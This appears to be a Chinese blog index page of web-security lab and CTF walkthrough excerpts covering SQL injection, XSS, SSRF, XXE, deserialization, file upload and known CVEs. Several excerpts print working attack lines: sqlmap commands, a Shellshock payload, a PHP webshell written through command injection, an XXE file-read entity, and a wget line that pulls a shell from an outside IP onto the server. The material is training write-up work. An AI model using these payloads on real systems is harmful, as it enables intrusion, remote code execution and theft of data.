自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

zh的博客

分享web安全的学习心得

  • 博客(43)
  • 收藏
  • 关注

原创 内网渗透模拟演练:使用sqlmap对内网mssql提权与反弹shell

准备:假设内网有一台2003服务器(使用mssql数据库),把网页服务80端口映射到防火墙8092端口,外网一台centos用来接收反弹shell工具:sqlmap、msf、apache sqlmap进行注入 测试页面存在注入点使用sqlmap进行注入 sqlmap -u "http://61.136.208.30:8092/Content.aspx?ClassId=1&id=4" -p "id" --dbms "mssql"注入成功,获取到了服务器信息

2021-10-24 17:35:09 4149

原创 Redis数据库未授权访问漏洞的三种利用方式

漏洞描述:由于Redis默认是运行在TCP的6379端口上,而且默认安装没有设置用户访问认证,也没有访问IP限制,这样导致端口开放后,对Redis服务可以直接匿名访问,并且可对数据库进行匿名操作,信息泄露,执行命令等操作。一、Redis数据库安装虚拟机CentOS7,Xshell连接,拷贝安装包,解压cd 看看有什么src 源码所在的文件夹安装编译工具:make 和 gcc记得选Y安装完成进入src目录,执行命令:make编译完...

2021-10-22 17:25:33 3662

原创 漏洞验证:SSRF-3

靶场地址:http://www.whalwl.host:8090/解题准备:爆破端口、准备外网服务器获取KEY值解题思路:1、思路与第二题一样,先确定本地开放端口BP抓包,设置变量,跑一遍发现XXXX端口打开,并有提示信息2、在外网服务器上使用NC监听一个端口,比如80883、靶场输入服务器IP和端口,即可获取key4、将key的值赋予参数auth,即可发现flag...

2021-10-16 10:07:30 173

原创 中间件:Weblogic弱口令&反序列化

靶场地址:http://www.whalwl.site:17001/hello/解题准备:jsp、linux查找文件命令解题思路:1、weblogic默认后台,弱口令weblogic Oracle@123http://www.whalwl.site:17001/console2、成功登录后台,左侧部署,选择安装3、选择已经存在的hello.war,选择上载文件,上传本地jsp4、一直下一步,直到最后保存5、成功访问jsp脚本,蚁剑连接成功6、翻了..

2021-10-15 11:40:27 858

原创 SQL注入:DNSlog注入

靶场地址:http://61.136.208.14:8003/解题准备:DNSlog平台解题思路:1、根据提示,需要使用dnslog平台进行注入DNSLog Platform生成并复制域名2、然后判断靶场的闭合符id=1 页面正常id=1' id=1' --+ 报错id=1 and 1=1 页面正常id=1 and 1=2 页面不正常确定没有闭合符,应该是数字型根据DNSlog注入的通用语句,构建注入语句?id=1 and (select load_

2021-10-12 23:21:01 845

原创 SQL注入:宽字节注入02

靶场地址:http://whalwl.host:8036/解题准备:注入点比较难找,而且抓包后需要追踪302跳转页面解题思路:1、找到注入点首先需要注册账号,登录后选择一款商品加入购物车,进入结算中心2、抓包注入,追踪302此时使用BP抓包,在provincce参数进行注入,注意要追踪302重定向后的页面,点击Follow redirection通过添加 ' 触发报错,通过报错语句确定闭合符为 ’)3、追踪302后即可确定数据库名:ecshop后.

2021-10-12 22:43:18 293

原创 SQL注入:宽字符注入

靶场地址:http://www.whalwl.host:8011解题准备:理解GBK的编码时,%5c拼接宽字符从而得到'解题思路:1、根据页面的提示,认为构造%df' 成功闭合 2、确定字段数3、确定字段数为5,使用联合查询看看回显位置4、顺利拿到数据库名和用户名后续注入不再赘述。...

2021-10-12 22:34:59 305

原创 XSS:XSS挖掘&绕过

靶场地址:http://www.whalwl.top:8013解题准备:本题需要绕过特殊符号的过滤解题思路:根据主页留言板,管理员告诉我们flag在它那里,于是给他私信,让它中招1、首先新建两个小号,互相测试哪种代码能够成功绕过过滤确定XSS代码后,再给管理员发私信,通过xss平台成功获取管理员cookie。经过小号互相测试,发现私信会过滤<s以及script,采用<img报错触发代码可以绕过,顺利收集cookie<img...

2021-10-11 21:40:51 565

原创 XSS:交友平台XSS漏洞

靶场地址:http://www.whalwl.top:8033解题准备:本题需要破解验证码,php和python脚本均可解题思路:1、注册,登录,出现两个链接两个都点开看看,第一个是更新资料页面,尝试XSS弹窗发现输入的代码原样显示,并没有起作用,此页面没有源代码,只能查看元素发现一对可疑元素<textarea></textarea>包括了输入的代码。于是先尝试闭合这个元素,点击更新,成功弹窗。</textarea>a..

2021-10-11 21:16:40 519

原创 docker复习:CVE-2016-10033验证

复习目的:回顾docker命令、了解漏洞利用过程准备:docker虚拟机、exp脚本、kali漏洞描述:WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构...

2021-10-22 16:12:13 525

原创 CSRF与SSRF学习笔记整理

CSRF跨站请求伪造漏洞介绍跨站点请求伪造(Cross Site Request Forgery)是一种经典的网络攻击方式,它一直是OWASP TOP 10之一,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来和跨站脚本攻击很相似,但它与跨站脚本攻击非常不同,并且攻击方式几乎完全不一样。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。跨站脚本攻击利用站点内的信任用户,而C

2021-10-19 11:13:48 1764

原创 SQL注入学习笔记整理

1、sql注入的基础知识1.11、数据库中的逻辑运算符或 且 非or and not真 且 真 =真真 且 假 =假真 或 假 =真and 比 or 的优先级要高1.12、mysql相关语法注释:#-- --空格/* *//*! */ 内联查询常见函数与参数:substring(string,position) 从某个位置开始截取字符串substr(string,start,length) 截取字符串的一部分left(str,l

2021-10-19 11:09:35 2598

原创 靶场练习:jsp+oracle注入

靶场地址:解题准备:sqlmap解题思路:1、库名sqlmap -u "http://61.136.208.14:8002/ActionServlet?action=viewArticle&articleId=1000" --dbs --batch2、表名sqlmap -u "http://61.136.208.14:8002/ActionServlet?action=viewArticle&articleId=1000" -D XBLO --tables -

2021-10-16 10:20:46 469

原创 aspx+mssql注入:Sqlmap

靶场地址:http://61.136.208.14:8001/解题准备:Sqlmap解题思路:1、使用工具尝试注入sqlmap -u "http://61.136.208.14:8001/Content.aspx?ClassId=1&id=4" --dbs --batch2、库名3、表名sqlmap -u "http://61.136.208.14:8001/Content.aspx?ClassId=1&id=4" -D dznews --tables..

2021-10-16 10:16:01 502

原创 代码审计:PHP代码审计01

靶场地址:http://www.whalwl.xyz:8017解题准备:熟悉PHP中的参数传递解题思路:1、在查询账户页面构造payload,POST方式提交name=or%2F**%2F1%3D1%23%27&submit=%E6%9F%A5%E8%AF%A22、直接获取flag, name=or/**/1=1#'...

2021-10-16 09:59:07 347

原创 反序列化漏洞验证:unserialize反序列化

靶场地址:http://www.whalwl.site:8026/解题准备:了解unserialize函数解题思路:1、将靶场提示代码搭建成网页,手动添加$obj=new site();echo serialize($obj);2、访问网页获取反序列化后的字符串使用dage参数传递反序列化字符串,尝试各种危险函数,最后assert成功了3、 POST方式提交dage,执行ls命令,得到flag文件名dage=O:4:"site":3:{s:3:"url";s:

2021-10-16 09:51:56 510

原创 反序列化:JBOSS反序列化

靶场地址:http://whalwl.site:8037/解题准备:反序列化基本原理解题思路:1、访问首页,发现有管理员后台链接,点击后获得JBOSS版本JBoss AS 6 Admin Console2、网上搜索相关漏洞访问这个地址报500,说明漏洞存在3、下载漏洞利用工具,填写刚才的漏洞地址,检测存在漏洞,执行相关系统命令获取flag4、工具直接执行命令...

2021-10-15 11:49:18 398

原创 中间件:tomcat任意文件写入

靶场地址:http://www.whalwl.site:18082解题准备:网上找exp解题思路:1、expimport requestsimport sysimport time'''Usage: python CVE-2017-12615.py http://127.0.0.1 shell: http://127.0.0.1/201712615.jsp?pwd=fff&cmd=whoami'''def attack(url): user_agent=

2021-10-15 11:45:55 234

原创 中间件:tomcat弱口令

靶场地址:http://www.whalwl.site:18081解题准备:弱口令、准备asp、jsp马解题思路:1、进入网站默认登录地址,使用弱口令tomcat tomcat登录后台http://www.whalwl.site:18081/manager/html2、在war上传点上传一句话,要求是.war后缀3、第一次使用asp木马,虽然能够连接但似乎没有权限,无法读取文件4、第二次使用jsp木马,网上复制一个蚁剑的,密码是passwd<%! cl.

2021-10-15 11:32:18 1368

原创 CMS漏洞:wordpress01

靶场地址:http://whalwl.site:8041/解题准备:准备POC解题思路:1、抓包,准备修改数据包执行命令,远程下载一个shell,到靶场网站根目录。/usr/bin/wget --output-document /var/www/html/999.php 167.160.xxx.217/999.txt2、具体请求包:POST /wp-login.php?action=lostpassword HTTP/1.1Host: target(any -fr...

2021-10-15 11:22:38 870

原创 SSRF:SSRF-02

靶场地址:http://www.whalwl.host:8090/解题准备:AWVS、BP爆破模块解题思路:1、扫描发现敏感文件2、发现限制IP访问,由于是服务器帮我们访问,IP应该没问题,那么可能是端口不对3、抓包,修改为本机127访问,并控制端口为变量4、爆破出200OK的端口号,重新访问status...

2021-10-15 11:18:11 415

原创 SSRS:SSRF-01

靶场地址:http://www.whalwl.host:8012/bug/ssrf/ssrf.php解题准备:SSRF原理,以及提示信息的理解解题思路:1、通过提示,搜索框访问http://dagebiedawo:802、查看源代码3、发现flag文件路径4、让服务器继续帮我们访问,搜索框粘贴flag地址,得到flag...

2021-10-15 11:13:52 256

原创 XXE:XXE外部实体漏洞

靶场地址:http://www.whalwl.host:8016/解题准备:XML外部实体注入,简称XXE解题思路:1、登录界面,点击login抓包,修改poc<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///flag"> ]><user><username>&xxe;</username>&lt

2021-10-15 11:07:48 267

原创 渗透测试:文件上传01

靶场地址:http://www.whalwl.site:8024/解题准备:了解文件上传的常见验证方式解题思路:1、弱口令 admin admin 登录后台在财务管理最下方有上传附件,确定为上传点先上传一张正常图片,获取到图片存储路径2、上传.jpg的一句话,抓包修改后缀php,即可使用蚁剑连接获取flag3、访问一下updata路径,发现已经成功上传4、蚁剑成功连接...

2021-10-15 11:04:06 234

原创 经典CVE:PHPMailer 远程命令执行漏洞

靶场地址:http://whalwl.site:8038/解题准备:了解PHPMailer 远程命令执行漏洞的利用方法解题思路:1、在右键发送页面,构造一句话2、提示发送失败,但其实一句话已经完成3、 尝试访问一句话,成功4、蚁剑连接成功,去找flag把...

2021-10-15 11:02:19 540

原创 经典CVE:破壳漏洞

靶场地址:http://www.whalwl.site:8029/解题准备:CVE编号:CVE-2014-6271解题思路:1、点击靶场主页的poc.cgi进行抓包,修改User-Agent:User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /bin/ls /2、成功执行后,即可发现flag文件3、继续查看flag...

2021-10-14 14:11:09 249

原创 经典CVE:Nginx整数溢出漏洞

靶场地址:http://www.whalwl.site:8040/ 解题准备:了解Nginx整数溢出漏洞的利用方法解题思路:1、根据首页提示,手动访问http://www.whalwl.site:8040/proxy/demo.png2、发现图片存在,于是根据提示构造poyloadcurl -i http://www.whalwl.site:8040/proxy/demo.png -r -17190,-9223372036854758618 > poc.txt3、..

2021-10-14 14:07:25 777

原创 命令执行:命令执行02

靶场地址:http://whalwl.xyz:8034/ 解题准备:准备DNSlog解题思路:1、万能密码绕过,成功登录1‘ or 1#密码随便,登录2、登录后进入控制台3、打开DNSLog.cn 获取一个域名,复制下来4、返回控制台,添加云主机的ip,红线处替换成刚刚复制的域名,提交备注1:ping -c 1 域名表示向域名,发送指定数量(1)的ping包备注2:linux中反引号的作用(` `)-------获取执行命令的结果例如:...

2021-10-14 14:03:15 345

原创 命令执行:命令执行01

靶场地址:http://whalwl.xyz:8033/ 解题准备:BP抓包,了解linux基本解压命令解题思路:1、BP抓包,替换POST中name的值backup.tar.gz;echo '<?php @eval($_POST["x"]); ?>' >shell.php2、成功上传3、使用蚁剑连接http://whalwl.xyz:8033/shell.php 密码为 x...

2021-10-14 13:58:35 178

原创 命令执行:webshell&中国菜刀

靶场地址:http://www.whalwl.xyz:8013解题准备:了解webshell的基本原理,以及连接数据库的参数定义解题思路:1、进入网站,直接告诉了webshell地址和连接密码2、使用中国蚁剑,连接成功。3、进入文件管理,一共四个文件,从init.php得到数据库配置信息4、 手动连接数据库5、填写数据库配置,测试连接成功,添加!6、从数据库中找到flag。...

2021-10-14 11:58:04 682

原创 命令执行:PHP代码练习

靶场地址:http://www.whalwl.xyz:8022/解题准备:了解PHP中调用系统命令的函数解题思路:1、编写系统命令代码2、查看根目录下的文件3、相对路径打开4、另一种路径打开

2021-10-14 11:53:45 91

原创 文件上传:00截断演练

靶场地址:http://whalwl.site:8025/解题准备:了解URL和POST方式的00截断姿势解题思路:1、方法:抓包2、在十六进制中进行00截断3、记录上传路径4、成功访问5、 蚁剑成功连接...

2021-10-14 11:50:07 149

原创 文件包含:LFI本地文件包含02

靶场地址:http://www.whalwl.site:8028/解题准备:AWVS、上传点比较难找解题思路:1、按照提示AWVS开扫​2、访问提示文件,发现账号密码​3、上传点在这里​4、检测下是否成功上传​​5、返回首页,点击刚刚创建的项目,发现已经成功解析​6、使用菜刀连接成功,发现flag​...

2021-10-14 11:35:29 323 1

原创 文件包含:LFI本地文件包含

靶场地址:http://www.whalwl.site:8014解题准备:AWVS、文件包含的原理解题思路:1、先用awvs进行扫描,确定目录结构,便于后面进行文件包含发现上传页面,上传图片马,记录路径文件名upload/202109021156467259.png手动访问图片,确定成功上传返回主页,进行文件包含,采用相对路径,成功用PHP解析了图片马蚁剑连接该包含图片地址,连接成功,flag在网站根目录下...

2021-10-14 11:25:29 233

原创 文件上传:Nginx解析漏洞

靶场地址:http://www.whalwl.site:8020/解题准备:了解Nginx解析漏洞解题思路:1、准备测试图片马首先做一个图片phpinfo(), .jpg上传成功,返回上传后的图片地址uploadfiles/b5f7a062d84869fe4f3af35b79fca50c.jpg2、浏览器访问图片地址,证明文件确实存在3、根据Nginx解析漏洞,在地址后面添加/1.php,成功执行4、同理上传一句话图片马。5、地址后面添加/.php,...

2021-10-12 23:33:12 577

原创 SQL注入:SOAP协议注入

靶场地址:http://www.whalwl.host:8018/解题准备:AWVS扫描,以及sqlmap解题思路:1、首先用AWVS扫描站点,发现存在soap注入的页面地址2、复制请求数据包,在kali中保存为soap.txt,使用sqlmap进行爆破sqlmap -r soap.txt3、确认数据为mysql,爆破库名sqlmap -r soap.txt --dbms mysql --dbswhalwl应该就是靶场数据库,继续爆tablessqlm...

2021-10-12 23:02:06 718

原创 SQL注入:POST盲注&万能密码/SQL报错注入

靶场地址:http://www.whalwl.host:8003/user/login.phphttp://www.whalwl.host:8004/user/edit.php解题准备:本题需要使用burpsuite解题思路:1、根据提示,个人中心,更新用户名这里存在POST注入BP抓包,对POST中username进行语法尝试,添加 ' 出现SQL报错采用报错注入,不需要进行盲注添加',根据报错判断,多了一个'闭合符为 ''...

2021-10-11 22:59:17 618

原创 SQL注入:SQL搜索型盲注

靶场地址:Web漏洞渗透测试系统http://www.whalwl.host:8002/search.php解题准备:本题需要使用wpsan,kali自带解题思路:1、首先登录,进入留言板,根据提示,通过搜索框进行注入a' 页面异常a' and 1=1 # 页面正常a' order by 10 # 异常a' order by 6 # 异常a' order by 5 # 正常确定字段数为52、使用hackbar,使用联合查询,如果在原网页提交查询,需要将get语句手

2021-10-11 22:54:35 297

原创 SQL注入:X-Forwarded-For注入

靶场地址:http://www.whalwl.host:8010/解题准备:本题需要使用burpsuite抓包解题思路:1、根据提示,直接抓包,添加X-Forwarded-For参数 a'2、根据报错,确定闭合符为 '构造:a' order by 6#5正常,6错误,确定字段数为53、构造联合查询,发现有2,3回显4、获得user和database5、后续注入通过联合查询可以很快获取flag...

2021-10-11 22:48:02 520 1

原创 SQL注入:Cookie注入

靶场地址:http://www.whalwl.host:8009解题准备:本题需要使用sqlmap,kali自带解题思路:1、根据提示,添加cookie参数id=1,放到sqlmap中跑sqlmap -u "http://www.whalwl.host:8009/user.php?" --cookie "id=1" --dbms mysql --level 2显示存在注入2、继续爆库名sqlmap -u "http://www.whalwl.host:8009/u..

2021-10-11 22:43:04 193

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除